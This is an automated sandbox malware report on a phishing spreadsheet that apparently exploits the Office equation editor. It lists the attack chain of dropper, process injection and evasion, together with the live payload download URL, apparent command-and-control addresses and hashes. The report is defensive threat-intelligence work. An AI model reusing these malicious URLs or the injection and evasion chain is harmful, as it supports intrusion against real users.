      Valid AccountsNative API1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery151Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532880 Sample: Quotation Request - Alligat... Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 42 www.sdffzc.com 2->42 44 minisite.alibaba.com.gds.alibabadns.com 2->44 46 minisite.alibaba.com 2->46 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 11 other signatures 2->62 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 33 29 2->16         started        signatures3 process4 dnsIp5 54 107.173.191.75, 49165, 80 AS-COLOCROSSINGUS United States 11->54 36 C:\Users\user\AppData\...\winlogon[1].exe, PE32 11->36 dropped 38 C:\Users\Public\vbc.exe, PE32 11->38 dropped 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->78 18 vbc.exe 17 11->18         started        40 ~$Quotation Reques...igator Pty Ltd.xlsx, data 16->40 dropped file6 signatures7 process8 file9 34 C:\Users\user\AppData\Local\...\uoqeqjqp.dll, PE32 18->34 dropped 64 Tries to detect virtualization through RDTSC time measurements 18->64 66 Injects a PE file into a foreign processes 18->66 22 vbc.exe 18->22         started        signatures10 process11 signatures12 68 Modifies the context of a thread in another process (thread injection) 22->68 70 Maps a DLL or memory area into another process 22->70 72 Sample uses process hollowing technique 22->72 74 Queues an APC in another process (thread injection) 22->74 25 explorer.exe 22->25 injected process13 dnsIp14 48 travelgleam.com 162.210.195.97, 49166, 80 LEASEWEB-USA-WDCUS United States 25->48 50 192.168.2.22, 49165, 49166, 49168 unknown unknown 25->50 52 4 other IPs or domains 25->52 76 System process connects to network (likely due to code injection or exploit) 25->76 29 msiexec.exe 25->29         started        signatures15 process16 signatures17 80 Modifies the context of a thread in another process (thread injection) 29->80 82 Maps a DLL or memory area into another process 29->82 32 cmd.exe 29->32         started        process18

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Quotation Request - Alligator Pty Ltd.xlsx31%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      7.2.msiexec.exe.29e796c.7.unpack100%AviraTR/Patched.Ren.GenDownload File
      7.2.msiexec.exe.2a35f0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      5.2.vbc.exe.2dd780.0.unpack100%AviraHEUR/AGEN.1104764Download File
      7.0.msiexec.exe.610000.0.unpack100%AviraHEUR/AGEN.1104764Download File
      5.0.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      5.0.vbc.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
      5.0.vbc.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      7.2.msiexec.exe.610000.1.unpack100%AviraHEUR/AGEN.1104764Download File
      4.2.vbc.exe.1e90000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      5.2.vbc.exe.25c0000.4.unpack100%AviraHEUR/AGEN.1104764Download File
      5.0.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.sdffzc.com/hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://107.173.191.75/dodge/winlogon.exe100%Avira URL Cloudmalware
      http://www.mozilla.com00%URL Reputationsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      www.dubaibiologicdentist.com/hf9j/0%Avira URL Cloudsafe
      http://treyresearch.net0%URL Reputationsafe
      http://www.travelgleam.com/hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A==0%Avira URL Cloudsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      minisite.alibaba.com.gds.alibabadns.com
      		47.246.136.142
      		truetrue
        		unknown
        travelgleam.com
        		162.210.195.97
        		truetrue
          		unknown
          www.sdffzc.com
          		unknown
          		unknowntrue
            		unknown
            www.travelgleam.com
            		unknown
            		unknowntrue
              		unknown
              www.subsoilcorp.com
              		unknown
              		unknowntrue
                		unknown
                www.ll1ysq.biz
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.sdffzc.com/hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpatrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://107.173.191.75/dodge/winlogon.exetrue
                  • Avira URL Cloud: malware
                  		unknown
                  www.dubaibiologicdentist.com/hf9j/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.travelgleam.com/hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A==true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpfalse
                    		high
                    http://www.windows.com/pctv.explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpfalse
                      		high
                      http://investor.msn.comEXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmpfalse
                            		high
                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmpfalse
                              		high
                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmpfalse
                                		high
                                http://investor.msn.com/EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.mozilla.com0explorer.exe, 00000006.00000000.493469713.0000000004399000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.495771332.0000000008414000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.504413647.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.501565204.0000000004513000.00000004.00000001.sdmpfalse
                                    		high
                                    http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.%s.comPAvbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		low
                                    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmpfalse
                                      		high
                                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://treyresearch.netexplorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.500770240.0000000003E50000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        107.173.191.75
                                        		unknownUnited States
                                        		36352AS-COLOCROSSINGUSfalse
                                        162.210.195.97
                                        		travelgleam.comUnited States
                                        		30633LEASEWEB-USA-WDCUStrue

                                        Private

                                        IP
                                        192.168.2.22
                                        192.168.2.255

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:532880
                                        Start date:02.12.2021
                                        Start time:19:16:45
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 11m 14s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Quotation Request - Alligator Pty Ltd.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@9/24@4/4
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 22.2% (good quality ratio 21.4%)
                                        • Quality average: 76.3%
                                        • Quality standard deviation: 27.1%
                                        HCA Information:
                                        • Successful, ratio: 91%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .xlsx
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Not all processes where analyzed, report is missing behavior information
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532880/sample/Quotation Request - Alligator Pty Ltd.xlsx

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        19:17:47API Interceptor68x Sleep call for process: EQNEDT32.EXE modified
                                        19:17:55API Interceptor75x Sleep call for process: vbc.exe modified
                                        19:18:22API Interceptor209x Sleep call for process: msiexec.exe modified
                                        19:19:09API Interceptor1x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        107.173.191.75quotation-linde-tunisia-plc-december-2021.xlsxGet hashmaliciousBrowse
                                        • 107.173.191.75/dodge/winlogon.exe
                                        Quotation - Linde Tunisia PLC..xlsxGet hashmaliciousBrowse
                                        • 107.173.191.75/dodge/winlogon.exe
                                        Quotation - Linde Tunisia PLC....xlsxGet hashmaliciousBrowse
                                        • 107.173.191.75/dodge/winlogon.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        minisite.alibaba.com.gds.alibabadns.compo.exeGet hashmaliciousBrowse
                                        • 205.204.101.158
                                        BvuKqSpgIG.exeGet hashmaliciousBrowse
                                        • 198.11.132.10
                                        po071.exeGet hashmaliciousBrowse
                                        • 198.11.132.10
                                        REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                        • 205.204.101.158

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        AS-COLOCROSSINGUSPO6738H.xlsxGet hashmaliciousBrowse
                                        • 107.172.73.132
                                        4514808437.xlsxGet hashmaliciousBrowse
                                        • 198.46.136.201
                                        Payment advise.xlsxGet hashmaliciousBrowse
                                        • 192.3.110.203
                                        Bank copy.xlsxGet hashmaliciousBrowse
                                        • 107.173.143.102
                                        SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
                                        • 198.46.136.201
                                        Cpia de LISTA FINAL TAIS - Orcamento.xlsxGet hashmaliciousBrowse
                                        • 198.23.207.39
                                        Shipping report -17420.xlsxGet hashmaliciousBrowse
                                        • 107.173.143.36
                                        sCmjcSzzHEGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                        • 107.172.73.132
                                        67068l4VSZGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        AEX-TR02122021.xlsxGet hashmaliciousBrowse
                                        • 107.172.76.210
                                        YRL3GshhZ2Get hashmaliciousBrowse
                                        • 23.94.36.134
                                        n1rNOMyyzFGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        XjwFx9RaZWGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        uVAge0xrAeGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        CViGmlFN5WGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        2KaqtqT95MGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        TkO4AGGKc2Get hashmaliciousBrowse
                                        • 23.94.36.134
                                        G7pPgOFUzFGet hashmaliciousBrowse
                                        • 23.94.36.134
                                        5C4B2IVIW9Get hashmaliciousBrowse
                                        • 23.94.36.134
                                        LEASEWEB-USA-WDCUSBKyU0T5xcwGet hashmaliciousBrowse
                                        • 207.244.67.163
                                        EwrGOFT5pd.exeGet hashmaliciousBrowse
                                        • 207.244.91.129
                                        tVStWV6q3EGet hashmaliciousBrowse
                                        • 216.22.1.160
                                        vbc.exeGet hashmaliciousBrowse
                                        • 207.244.91.129
                                        Lv9eznkydx.exeGet hashmaliciousBrowse
                                        • 207.58.141.248
                                        28jJSvNzXz.exeGet hashmaliciousBrowse
                                        • 108.59.2.51
                                        29nr5GdK5M.exeGet hashmaliciousBrowse
                                        • 207.244.95.223
                                        FkJcMEZd4i.exeGet hashmaliciousBrowse
                                        • 207.244.95.223
                                        SQLPLUS.EXEGet hashmaliciousBrowse
                                        • 199.115.116.162
                                        HoGxvkYZd5Get hashmaliciousBrowse
                                        • 207.244.67.153
                                        Quotation For This Order 091621.exeGet hashmaliciousBrowse
                                        • 23.82.12.32
                                        U9PlTfwfk7.exeGet hashmaliciousBrowse
                                        • 23.105.171.65
                                        championship.dllGet hashmaliciousBrowse
                                        • 108.62.118.69
                                        DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                        • 23.82.12.31
                                        Purchase order_dated 08-14-2021.exeGet hashmaliciousBrowse
                                        • 23.82.12.32
                                        Balance payment advice.exeGet hashmaliciousBrowse
                                        • 23.82.12.30
                                        7NuxE5BCX7Get hashmaliciousBrowse
                                        • 206.214.217.6
                                        RhalEFwYre.exeGet hashmaliciousBrowse
                                        • 23.82.12.30
                                        doc783748934334 PDF.exeGet hashmaliciousBrowse
                                        • 207.244.67.139
                                        88AB0FB7AAB828733D7FAD8DD72BA73C7188803ED85C1.exeGet hashmaliciousBrowse
                                        • 162.210.196.173

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exe
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):513443
                                        Entropy (8bit):7.37315837962637
                                        Encrypted:false
                                        SSDEEP:12288:7lIKV65P7x6p5laFBAteHb9Pzrv4QHA5A:7Cq47xO5MXAtYxbrQgAe
                                        MD5:8E90E8E526BC80036BA6B50A913A1880
                                        SHA1:56F076B442E362E58E787FCEA35CEA45A70447EE
                                        SHA-256:50901C9BDF963127A05847C8C0A1D71D8C02310C491A159CF87A1E888CEAB348
                                        SHA-512:60F5346007C19104284630001F665AE8B74C71DAB5B7BF8D6A60AA639281929A0F8E60DED6150A3B395DD56C0DC0A5B13824329CA1C093EC96ACAAAF50A0E5BA
                                        Malicious:true
                                        Reputation:low
                                        IE Cache URL:http://107.173.191.75/dodge/winlogon.exe
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................@...............................................t.......p..@............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc...@....p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\196BE5C3.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CC27E4A.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3668CB87.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AF4462D.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
